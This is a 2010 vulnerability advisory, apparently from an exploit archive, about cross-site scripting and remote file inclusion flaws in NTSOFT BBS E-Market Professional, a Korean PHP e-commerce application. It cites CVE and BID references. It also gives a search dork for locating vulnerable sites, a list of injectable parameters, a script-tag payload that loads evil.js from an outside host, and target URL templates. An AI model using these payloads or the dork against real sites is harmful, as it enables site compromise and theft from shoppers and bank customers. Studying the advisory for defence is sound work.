+================================================================================================+
NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil
code +
+================================================================================================+
Author(s): Ivan Sanchez
Product: NTSOFT, All Right Reserved.
Vendor Overview: NTSOFT. (Korean ecommerce application)
Vendor Homepage: http://www.nt.co.kr/
Date: 03/07/2010
"most off all korean sites that handle e-shop , e-banking,… use this software"
BBS E-Market Professional is a Korean Web based e-commerce application implemented
in PHP.
BBS E-Market Professional is reported to be affected by a remote file include
vulnerability that may allow an attacker to include malicious files containing
arbitrary code to be executed on a vulnerable system.
The issue presents itself due to improper validation of user-supplied data.
http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt
http://www.securityfocus.com/bid/35893
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152
http://xforce.iss.net/xforce/xfdb/52157
http://secunia.com/advisories/26117
http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html
intext: "NTSOFT All rights reserved"
Parameters affected:
2010:
pageurl= evil.js
co_no= evil.js
b_temcode= evil.js
2009:
page= evil.js
bt_code= evil.js
b_no= evil.js
Example: "><script src=http://site/scripts/evil.js></script>
2009:
http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code
2010:
http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE
Thank you so Much! Ivan,
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================+
NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil
code +
+================================================================================================+